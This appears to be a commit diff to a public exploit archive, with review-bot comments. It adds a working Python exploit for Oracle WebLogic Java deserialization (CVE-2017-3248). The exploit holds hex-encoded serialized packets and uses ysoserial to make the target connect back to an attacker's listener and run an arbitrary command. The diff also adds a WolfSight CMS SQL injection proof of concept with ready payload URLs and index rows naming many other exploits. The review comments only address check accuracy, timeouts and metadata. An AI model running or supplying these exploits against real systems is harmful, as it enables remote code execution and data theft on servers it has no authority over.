+payload_3_3_1 = 'aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
+#C.3.2 Ysoserial Payload generated in real time
+payload_3_3_2 = ""
+#C.4 End of the payload
+payload_3_4 = 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
+
+def runCmd(cmd):
+ proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
+ stdout_value = proc.stdout.read() + proc.stderr.read()
+ return stdout_value
+
+def getJrmpClientPayloadEncoded(attackerIp, attackerJRMPListenerPort, ysoPath):
+ completeCmd = CMD_GET_JRMPCLIENT_PAYLOAD.format(ysoPath, ARGS_YSO_GET_PAYLOD.format(attackerIp, attackerJRMPListenerPort))
+ print "[+] Ysoserial command (JRMP client): {0}".format(repr(completeCmd))
+ stdout = runCmd(cmd = completeCmd)
+ return stdout
+
+def exploit(targetIP, targetPort, attackerIP, attackerJRMPPort, cmd, testOnly=False, payloadType='CommonsCollections5', sslEnabled=False, ysoPath=""):
+ if testOnly == True:
+ attackerIP = "127.0.0.1"
+ attackerJRMPPort = 0
+ print "[+] Connecting to {0}:{1} ...".format(targetIP, targetPort)
+ if sslEnabled == True:
+ print "[+] ssl mode enabled"
+ s = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
+ else:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ print "[+] ssl mode disabled"
+ s.connect((targetIP, targetPort))
+ print "[+] Connected to {0}:{1}".format(targetIP, targetPort)
+ print "[+] Sending first packet..."
+ #print "[S1] Sending {0}".format(repr(payload_1.decode('hex')))
+ s.sendall(payload_1.decode('hex'))
+ data = s.recv(4096)
+ #print '[R1] Received', repr(data)
+ print "[+] Sending second packet..."
+ #print "[S2] Sending {0}".format(repr(payload_2.decode('hex')))
+ s.sendall(payload_2.decode('hex'))
+ data = s.recv(4096)
+ #print '[R2] Received', repr(data)
+ print "[+] Generating with ysoserial the third packet which contains a JRMPClient payload..."
+ payload_3_3_2 = getJrmpClientPayloadEncoded(attackerIp=attackerIP, attackerJRMPListenerPort=attackerJRMPPort, ysoPath=ysoPath)
+ payload= payload_3_1 + payload_3_2 + payload_3_3_1 + payload_3_3_2 + payload_3_4
+ payload = payload.replace(payload_3_1, "0000{:04x}".format(len(payload)/2), 1)
+ sendata = payload.decode('hex')
+ if testOnly == False:
+ print "[+] You have to execute the following command locally:"
+ print " {0}".format(CMD_YSO_LISTEN.format(ysoPath, attackerJRMPPort, payloadType,cmd))
+ raw_input("[+] Press Enter when this previous command is running...")
+ print "[+] Sending third packet..."
+ #print "[S3] Sending {0}".format(repr(sendata))
+ s.sendall(sendata)
+ data = s.recv(4096)
+ s.close()
+ #print '[R3] Received', repr(data)
+ if testOnly == True:
+ if "cannot be cast to weblogic" in str(data):
+ print "[+] 'cannot be cast to weblogic' string in the third response from server"
+ print "\n{2}\n[-] target {0}:{1} is not vulnerable\n{2}\n".format(targetIP, targetPort, '-'*60)
+ else:
+ print "[+] 'cannot be cast to weblogic' string is NOT in the third response from server"
+ print "\n{2}\n[+] target {0}:{1} is vulnerable\n{2}\n".format(targetIP, targetPort, '-'*60)
+ else:
+ print "[+] The target will connect to {0}:{1}".format(attackerIP, attackerJRMPPort)
+ print "[+] The command should be executed on the target after connection on {0}:{1}".format(attackerIP, attackerJRMPPort)
+
+def main():
+ argsParsed = argparse.ArgumentParser(description=HELP_MESSAGE, formatter_class=RawTextHelpFormatter)
+ argsParsed.add_argument("-t", dest='target', required=True, help='target IP')
+ argsParsed.add_argument("-p", dest='port', type=int, required=True, help='target port')
+ argsParsed.add_argument("--jip", dest='attackerIP', required=False, help='Local JRMP listener ip')
+ argsParsed.add_argument("--jport", dest='attackerPort', type=int, default=3412, required=False, help='Local JRMP listener port (default: %(default)s)')
+ argsParsed.add_argument("--cmd", dest='cmdToExecute', help='Command to execute on the target')
+ argsParsed.add_argument("--check", dest='check', action='store_true', default=False, help='Check if vulnerable')
+ argsParsed.add_argument("--ssl", dest='sslEnabled', action='store_true', default=False, help='Enable ssl connection')
+ argsParsed.add_argument("--ysopath", dest='ysoPath', required=True, default=False, help='Ysoserial path')
+ argsParsed.add_argument("--payloadType", dest='payloadType', default="CommonsCollections5", help='Payload to use in JRMP listener (default: %(default)s)')
+ args = dict(argsParsed.parse_args()._get_kwargs())
+ if os.path.isfile(args['ysoPath'])==False:
+ print "[-] You have to give the path to Ysoserial with --ysopath (https://github.com/frohoff/ysoserial)!"
+ return -1
+ if args['check'] == False and args['attackerIP'] == None:
+ print "[-] You have to give an IP with --jip !"
+ return -1
+ elif args['check'] == False and args['cmdToExecute'] == None:
+ print "[-] You have to give a command to execute on the target with --cmd !"
+ return -1
+ if args['check'] == True:
+ print "[+] Checking if target {0}:{1} is vulnerable to CVE-2017-3248 without executing a system command on the target...".format(args['target'], args['port'])
+ exploit(targetIP=args['target'], targetPort=args['port'], attackerIP=None, attackerJRMPPort=None, cmd=None, testOnly=True, sslEnabled=args['sslEnabled'], ysoPath=args['ysoPath'])
+ else:
+ print "[+] Exploiting target {0}:{1}...".format(args['target'], args['port'])
+ exploit(targetIP=args['target'], targetPort=args['port'], attackerIP=args['attackerIP'], attackerJRMPPort=args['attackerPort'], cmd=args['cmdToExecute'], payloadType=args['payloadType'], testOnly=False, sslEnabled=args['sslEnabled'],ysoPath=args['ysoPath'])
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
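Review bot: In `exploit()`, the `testOnly` branch prints `is vulnerable` for every third response that lacks the string `cannot be cast to weblogic`, which includes an empty `recv` or a service that is not WebLogic at all, so `--check` over-reports. I would add an inconclusive case between the inner `if` and its `else`, e.g. `elif not data: print "[?] no response to third packet, result inconclusive"`. The socket has no timeout, so a filtered port blocks the check indefinitely; `s.settimeout(10)` right after the socket is created bounds that. `runCmd` also passes a string built from `--ysopath` and `--jip` to `Popen(..., shell=True)` unquoted, which is worth a comment because those arguments are interpreted by the local shell.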
diff --git a/exploits/php/webapps/44997.txt b/exploits/php/webapps/44997.txt
new file mode 100644
index 000000000..3705fe0c9
--- /dev/null
+++ b/exploits/php/webapps/44997.txt
@@ -0,0 +1,31 @@
+# Exploit Title: WolfSight CMS 3.2 - SQL Injection
+# Google Dork: N/A
+# Date: 2018-07-10
+# Exploit Author: Berk Dusunur & Zehra Karabiber
+# Vendor Homepage: http://www.wolfsight.com
+# Software Link: http://www.wolfsight.com
+# Version: v3.2
+# Tested on: Parrot OS / WinApp Server
+# CVE : N/A
+
+# PoC Sql Injection
+# Parameter: #1* (URI)
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload:
+
+http://www.ip/page1-%bf%bf"-page1/' AND (SELECT 7988 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT(ELT(7988=7988,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'WpDn'='WpDn
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 OR time-based blind
+# Payload:
+
+http://www.ip/page1-%bf%bf"-page1/'OR SLEEP(5) AND 'kLLx'='kLLx
+
+# PoC Cross-Site Scripting
+# http://ip/admin/login.php
+# Username
+
+
+
+# This vulnerability was identified during bug bounty
\ No newline at end of file
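Review bot: The `# PoC Cross-Site Scripting` section at the end of 44997.txt is empty: after `# Username` there are only blank `+` lines, so the entry asserts a second finding on `/admin/login.php` without saying whether it is stored or reflected, or what a defender should look for. Either complete that description or drop the section, and if it stays the title should cover it, e.g. `# Exploit Title: WolfSight CMS 3.2 - SQL Injection / Cross-Site Scripting`. The header also carries no disclosure or fix status, which is what triage needs first. A line such as `# Vendor notified: <date or "no"> / Fixed in: <version or "unpatched">` would close that gap. Both payloads put the injection in the page-slug URI segment, which suggests (not confirmed from this file) that the slug is concatenated into a MySQL query, so a one-line remediation note pointing at parameterized queries for that lookup would make the entry usable for patch verification.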
diff --git a/files_exploits.csv b/files_exploits.csv
index 07951462d..34e62982a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -16603,8 +16603,10 @@ id,file,description,date,author,type,platform,port
44985,exploits/windows/remote/44985.c,"PolarisOffice 2017 8 - Remote Code Execution",2018-07-06,hyp3rlinx,remote,windows,
44987,exploits/windows/remote/44987.txt,"Activision Infinity Ward Call of Duty Modern Warfare 2 - Buffer Overflow",2018-07-09,"Maurice Heumann",remote,windows,
44991,exploits/linux/remote/44991.rb,"HP VAN SDN Controller - Root Command Injection (Metasploit)",2018-07-09,Metasploit,remote,linux,8081
-44992,exploits/linux/remote/44992.rb,"HID discoveryd - command_blink_on Unauthenticated RCE (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
+44992,exploits/linux/remote/44992.rb,"HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,
+45000,exploits/linux_x86-64/remote/45000.c,"OpenSSH < 6.6 SFTP (x64) - Command Execution",2014-10-08,"Jann Horn",remote,linux_x86-64,
+45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39627,7 +39629,6 @@ id,file,description,date,author,type,platform,port
44959,exploits/hardware/webapps/44959.py,"VMware NSX SD-WAN Edge < 3.1.2 - Command Injection",2018-07-02,ParagonSec,webapps,hardware,
44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
44964,exploits/php/webapps/44964.txt,"Dolibarr ERP CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
-44970,exploits/linux/webapps/44970.txt,"ModSecurity 3.0.0 - Cross-Site Scripting",2018-07-03,"Adipta Basu",webapps,linux,
44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,
44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,
44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php,
@@ -39636,3 +39637,8 @@ id,file,description,date,author,type,platform,port
44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80
44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php,
+44996,exploits/multiple/webapps/44996.py,"Gitea 1.4.0 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,multiple,
+44997,exploits/php/webapps/44997.txt,"WolfSight CMS 3.2 - SQL Injection",2018-07-10,"Berk Dusunur",webapps,php,80
+44998,exploits/multiple/webapps/44998.py,"Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution",2018-07-07,bobsecq,webapps,multiple,
+44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux,
+45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
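Review bot: The index row added for 44997 does not agree with the file added in the same commit: the row credits only `"Berk Dusunur"`, while the header of exploits/php/webapps/44997.txt reads `# Exploit Author: Berk Dusunur & Zehra Karabiber`. If the author column accepts more than one name, the field should be `"Berk Dusunur & Zehra Karabiber"`; otherwise the file header and the index should be reconciled some other way, so attribution searches return the same result from both. The row's description also lists only SQL injection although the file carries a cross-site scripting section, so anyone filtering the index by vulnerability class will miss it.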